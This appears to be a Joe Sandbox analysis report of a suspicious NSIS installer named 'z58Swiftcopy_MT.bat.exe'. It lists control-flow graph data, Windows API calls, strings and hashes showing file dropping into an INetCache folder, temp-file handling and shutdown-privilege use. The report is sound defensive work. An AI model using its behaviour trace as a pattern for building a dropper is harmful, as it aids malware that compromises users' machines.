402951 5609->5610 5611 402946 InvalidateRect 5609->5611 5611->5610 5619 405134 5620 405144 5619->5620 5621 405158 5619->5621 5622 4051a1 5620->5622 5623 40514a 5620->5623 5624 405160 IsWindowVisible 5621->5624 5630 405177 5621->5630 5625 4051a6 CallWindowProcA 5622->5625 5626 4041a6 SendMessageA 5623->5626 5624->5622 5627 40516d 5624->5627 5628 405154 5625->5628 5626->5628 5632 404a8b SendMessageA 5627->5632 5630->5625 5637 404b0b 5630->5637 5633 404aea SendMessageA 5632->5633 5634 404aae GetMessagePos ScreenToClient SendMessageA 5632->5634 5635 404ae2 5633->5635 5634->5635 5636 404ae7 5634->5636 5635->5630 5636->5633 5646 406099 lstrcpynA 5637->5646 5639 404b1e 5647 405ff7 wsprintfA 5639->5647 5641 404b28 5642 40140b 2 API calls 5641->5642 5643 404b31 5642->5643 5648 406099 lstrcpynA 5643->5648 5645 404b38 5645->5622 5646->5639 5647->5641 5648->5645 5649 4026b4 5650 4026ba 5649->5650 5651 402951 5650->5651 5652 4026c2 FindClose 5650->5652 5652->5651 5653 402736 5654 402ac1 17 API calls 5653->5654 5655 402744 5654->5655 5656 40275a 5655->5656 5657 402ac1 17 API calls 5655->5657 5658 405c0d 2 API calls 5656->5658 5657->5656 5659 402760 5658->5659 5681 405c32 GetFileAttributesA CreateFileA 5659->5681 5661 40276d 5662 402816 5661->5662 5663 402779 GlobalAlloc 5661->5663 5664 402831 5662->5664 5665 40281e DeleteFileA 5662->5665 5666 402792 5663->5666 5667 40280d CloseHandle 5663->5667 5665->5664 5682 4032c5 SetFilePointer 5666->5682 5667->5662 5669 402798 5670 4032af ReadFile 5669->5670 5671 4027a1 GlobalAlloc 5670->5671 5672 4027b1 5671->5672 5673 4027eb 5671->5673 5674 40303e 44 API calls 5672->5674 5675 405cd9 WriteFile 5673->5675 5680 4027be 5674->5680 5676 4027f7 GlobalFree 5675->5676 5677 40303e 44 API calls 5676->5677 5678 40280a 5677->5678 5678->5667 5679 4027e2 GlobalFree 5679->5673 5680->5679 5681->5661 5682->5669 5683 4014b7 5684 4014bd 5683->5684 5685 401389 2 API calls 5684->5685 5686 4014c5 5685->5686 5687 401b39 5688 402ac1 17 API calls 5687->5688 5689 
401b40 5688->5689 5690 402a9f 17 API calls 5689->5690 5691 401b49 wsprintfA 5690->5691 5692 402951 5691->5692 4629 40233a 4630 402ac1 17 API calls 4629->4630 4631 40234b 4630->4631 4632 402ac1 17 API calls 4631->4632 4633 402354 4632->4633 4634 402ac1 17 API calls 4633->4634 4635 40235e GetPrivateProfileStringA 4634->4635 4636 4015bb 4637 402ac1 17 API calls 4636->4637 4638 4015c2 4637->4638 4639 405aca 4 API calls 4638->4639 4644 4015ca 4639->4644 4640 401624 4642 401652 4640->4642 4643 401629 4640->4643 4641 405a5c CharNextA 4641->4644 4646 401423 24 API calls 4642->4646 4655 401423 4643->4655 4644->4640 4644->4641 4648 405703 2 API calls 4644->4648 4651 405720 5 API calls 4644->4651 4653 40160c GetFileAttributesA 4644->4653 4654 405686 4 API calls 4644->4654 4649 40164a 4646->4649 4648->4644 4651->4644 4652 40163b SetCurrentDirectoryA 4652->4649 4653->4644 4654->4644 4656 4051c0 24 API calls 4655->4656 4657 401431 4656->4657 4658 406099 lstrcpynA 4657->4658 4658->4652 5693 401d3b GetDlgItem GetClientRect 5694 402ac1 17 API calls 5693->5694 5695 401d6b LoadImageA SendMessageA 5694->5695 5696 402951 5695->5696 5697 401d89 DeleteObject 5695->5697 5697->5696 5698 4016bb 5699 402ac1 17 API calls 5698->5699 5700 4016c1 GetFullPathNameA 5699->5700 5701 4016d8 5700->5701 5707 4016f9 5700->5707 5704 40639c 2 API calls 5701->5704 5701->5707 5702 402951 5703 40170d GetShortPathNameA 5703->5702 5705 4016e9 5704->5705 5705->5707 5708 406099 lstrcpynA 5705->5708 5707->5702 5707->5703 5708->5707 5709 404b3d GetDlgItem GetDlgItem 5710 404b8f 7 API calls 5709->5710 5717 404da7 5709->5717 5711 404c32 DeleteObject 5710->5711 5712 404c25 SendMessageA 5710->5712 5713 404c3b 5711->5713 5712->5711 5715 404c72 5713->5715 5716 4060bb 17 API calls 5713->5716 5714 404e8b 5719 404f37 5714->5719 5724 404d9a 5714->5724 5729 404ee4 SendMessageA 5714->5729 5718 40415a 18 API calls 5715->5718 5720 404c54 SendMessageA SendMessageA 5716->5720 5717->5714 5727 404a8b 5 API calls 5717->5727 5743 
404e18 5717->5743 5723 404c86 5718->5723 5721 404f41 SendMessageA 5719->5721 5722 404f49 5719->5722 5720->5713 5721->5722 5731 404f62 5722->5731 5732 404f5b ImageList_Destroy 5722->5732 5738 404f72 5722->5738 5728 40415a 18 API calls 5723->5728 5725 4041c1 8 API calls 5724->5725 5730 40512d 5725->5730 5726 404e7d SendMessageA 5726->5714 5727->5743 5744 404c94 5728->5744 5729->5724 5734 404ef9 SendMessageA 5729->5734 5736 404f6b GlobalFree 5731->5736 5731->5738 5732->5731 5733 4050e1 5733->5724 5739 4050f3 ShowWindow GetDlgItem ShowWindow 5733->5739 5735 404f0c 5734->5735 5746 404f1d SendMessageA 5735->5746 5736->5738 5737 404d68 GetWindowLongA SetWindowLongA 5740 404d81 5737->5740 5738->5733 5753 404b0b 4 API calls 5738->5753 5755 404fad 5738->5755 5739->5724 5741 404d87 ShowWindow 5740->5741 5742 404d9f 5740->5742 5760 40418f SendMessageA 5741->5760 5761 40418f SendMessageA 5742->5761 5743->5714 5743->5726 5744->5737 5745 404ce3 SendMessageA 5744->5745 5747 404d62 5744->5747 5751 404d30 SendMessageA 5744->5751 5752 404d1f SendMessageA 5744->5752 5745->5744 5746->5719 5747->5737 5747->5740 5748 404ff1 5754 4050b7 InvalidateRect 5748->5754 5759 405065 SendMessageA SendMessageA 5748->5759 5751->5744 5752->5744 5753->5755 5754->5733 5756 4050cd 5754->5756 5755->5748 5757 404fdb SendMessageA 5755->5757 5758 404a46 20 API calls 5756->5758 5757->5748 5758->5733 5759->5748 5760->5724 5761->5717

Control-flow Graph

• Executed
• Not Executed

[Control-flow graph figure, starting at block 40330d-40334c (SetErrorMode, GetVersion); node and edge data not reproduced]
APIs
• SetErrorMode.KERNELBASE ref: 00403332
• GetVersion.KERNEL32 ref: 00403338
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040336B
• #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033A7
• OleInitialize.OLE32(00000000), ref: 004033AE
• SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004033CA
• GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004033DF
• GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",00000000,?,00000006,00000008,0000000A), ref: 004033F2
• CharNextA.USER32(00000000,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",00000020,?,00000006,00000008,0000000A), ref: 0040341D
• GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040351A
• GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040352B
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403537
• GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040354B
• lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403553
• SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403564
• SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040356C
• DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403580
  • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
  • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
  • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
  • Part of subcall function 004038E9: GetUserDefaultUILanguage.KERNELBASE(00000002,762D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",00000000), ref: 00403903
  • Part of subcall function 004038E9: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne,1033,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,762D3410), ref: 004039D9
  • Part of subcall function 004038E9: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
  • Part of subcall function 004038E9: GetFileAttributesA.KERNEL32(Call), ref: 004039F7
  • Part of subcall function 004038E9: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne), ref: 00403A40
  • Part of subcall function 004038E9: RegisterClassA.USER32(00423EC0), ref: 00403A7D
  • Part of subcall function 004037F7: CloseHandle.KERNEL32(000002A8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 00403809
                                                                                                                                                                                                                                        • Part of subcall function 004037F7: CloseHandle.KERNEL32(000002C8,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040381D
                                                                                                                                                                                                                                      • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 0040362E
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040364F
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 0040376C
                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403773
                                                                                                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040378B
                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037AA
                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004037CE
                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 004037F1
                                                                                                                                                                                                                                        • Part of subcall function 004057B5: MessageBoxIndirectA.USER32(0040A230), ref: 00405810
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleProcess$ExitFile$CloseEnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpilstrcpyn
                                                                                                                                                                                                                                      • String ID: "$"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$.tmp$1033$51052544$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$user32::EnumWindows(i r1 ,i 0)$~nsu
                                                                                                                                                                                                                                      • API String ID: 1129060429-3790880674
                                                                                                                                                                                                                                      • Opcode ID: 80222e2a1608f68e9a01e2d4467cb4f437ef41324d85fef8055a94e839ea45f6
                                                                                                                                                                                                                                      • Instruction ID: 629f98fd345f67a1e75e2db33264847053f345a98c6a7e8b50a39e9081f0102f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80222e2a1608f68e9a01e2d4467cb4f437ef41324d85fef8055a94e839ea45f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46C1E6702047506AD721AF759D89A2F3EACAB81706F45443FF581B61E2CB7C8A158B2F

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DeleteFileA.KERNELBASE(?,?,762D3410,762D2EE0,00000000), ref: 0040588A
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00421D38,\*.*,00421D38,?,?,762D3410,762D2EE0,00000000), ref: 004058D2
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,0040A014,?,00421D38,?,?,762D3410,762D2EE0,00000000), ref: 004058F3
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,0040A014,?,00421D38,?,?,762D3410,762D2EE0,00000000), ref: 004058F9
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00421D38,?,?,?,0040A014,?,00421D38,?,?,762D3410,762D2EE0,00000000), ref: 0040590A
                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004059B7
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004059C8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe", xrefs: 00405861
                                                                                                                                                                                                                                      • \*.*, xrefs: 004058CC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$\*.*
                                                                                                                                                                                                                                      • API String ID: 2035342205-3460820883
                                                                                                                                                                                                                                      • Opcode ID: e51b648568a1e5a9b47539b24ed2716d15288ef485a4508b80519d1c974b3528
                                                                                                                                                                                                                                      • Instruction ID: 1dcfc4082d76b88a8dbc056b088e655b37054d2965a561fc4bca86fefb361094
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e51b648568a1e5a9b47539b24ed2716d15288ef485a4508b80519d1c974b3528
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C51AF71900A04EADB22AB258C85BBF7A78DF42724F14817BF851B51D2D73C4982DF6E

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
                                                                                                                                                                                                                                      • Instruction ID: 4aa70ef1b53fe275c3baa8fcae8ec6f6e0a9bb882f540f469220498d10fac131
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33747ec9ccf1e96e03ed3acadba13ccb82446055e1a2ca0fa1c9679c5aff3799
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9F16671D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D7785A9ACF44
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileA.KERNELBASE(762D3410,00422580,C:\,00405B62,C:\,C:\,00000000,C:\,C:\,762D3410,?,762D2EE0,00405881,?,762D3410,762D2EE0), ref: 004063A7
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004063B3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                      • String ID: C:\
                                                                                                                                                                                                                                      • API String ID: 2295610775-3404278061

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                                                                                                                                                                                                                        • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                                                                                                                                                                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,762D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",00000000), ref: 00403903
                                                                                                                                                                                                                                        • Part of subcall function 00405FF7: wsprintfA.USER32 ref: 00406004
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(1033,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,762D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",00000000), ref: 00403964
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne,1033,00420D30,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D30,00000000,00000002,762D3410), ref: 004039D9
                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
                                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 004039F7
                                                                                                                                                                                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne), ref: 00403A40
                                                                                                                                                                                                                                      • RegisterClassA.USER32(00423EC0), ref: 00403A7D
                                                                                                                                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403A95
                                                                                                                                                                                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403ACA
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403B00
                                                                                                                                                                                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,00423EC0), ref: 00403B2C
                                                                                                                                                                                                                                      • GetClassInfoA.USER32(00000000,RichEdit,00423EC0), ref: 00403B39
                                                                                                                                                                                                                                      • RegisterClassA.USER32(00423EC0), ref: 00403B42
                                                                                                                                                                                                                                      • DialogBoxParamA.USER32(?,00000000,00403C86,00000000), ref: 00403B61
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$.DEFAULT\Control Panel\International$.exe$0B$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                      • API String ID: 606308-2139792627

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402DAC
                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,00000400), ref: 00402DC8
                                                                                                                                                                                                                                        • Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00405C36
                                                                                                                                                                                                                                        • Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0042C000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00402E11
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0040A130), ref: 00402F58
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FEF
                                                                                                                                                                                                                                      • soft, xrefs: 00402E88
                                                                                                                                                                                                                                      • C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe, xrefs: 00402DB2, 00402DC1, 00402DD5, 00402DF2
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe", xrefs: 00402D98
                                                                                                                                                                                                                                      • Null, xrefs: 00402E91
                                                                                                                                                                                                                                      • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FA1
                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00402DE8
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DA2, 00402F70
                                                                                                                                                                                                                                      • C:\Users\user\Desktop, xrefs: 00402DF3, 00402DF8, 00402DFE
                                                                                                                                                                                                                                      • Inst, xrefs: 00402E7F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004061E6
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,00420510,00000000,004051F8,00420510,00000000), ref: 004061F9
                                                                                                                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(004051F8,00000000,?,00420510,00000000,004051F8,00420510,00000000), ref: 00406235
                                                                                                                                                                                                                                      • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406243
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040624F
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406273
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(Call,?,00420510,00000000,004051F8,00420510,00000000,00000000,00000000,00000000), ref: 004062C5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                                                      • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne,00000000,00000000,00000031), ref: 00401798
                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\stvbrernes\Cementfabrikkerne,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                                                                                                                        • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
